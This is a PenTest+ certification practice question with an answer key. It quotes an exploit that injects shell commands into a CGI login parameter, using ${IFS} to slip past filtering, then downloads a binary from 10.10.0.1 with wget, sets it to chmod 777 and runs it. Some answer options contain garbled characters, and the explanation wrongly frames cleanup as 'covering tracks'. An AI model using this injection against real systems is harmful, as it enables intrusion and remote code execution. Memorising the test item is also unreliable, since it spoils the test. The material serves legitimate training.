CompTIA PenTest+ (PT1-002) — Question 107

A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized: exploit = `POST ` exploit += `/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} `" c${IFS}'cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;${IFS}./apache'%0A%
27&loginUser=a&Pwd=a`
exploit += `HTTP/1.1`
Which of the following commands should the penetration tester run post-engagement?

Answer options

• A. grep ג€"v apache ~/.bash_history > ~/.bash_history
• B. rm ג€"rf /tmp/apache
• C. chmod 600 /tmp/apache
• D. taskkill /IM ג€apacheג€ /F

Correct answer: B

Explanation

The correct answer is B, as it removes the malicious file 'apache' from the /tmp directory, which is essential for covering tracks. Option A attempts to filter bash history but does not effectively remove the exploit. Option C changes the permissions of the file, which does not eliminate it, while option D is irrelevant as it pertains to Windows processes and not the Linux environment where the exploit was executed.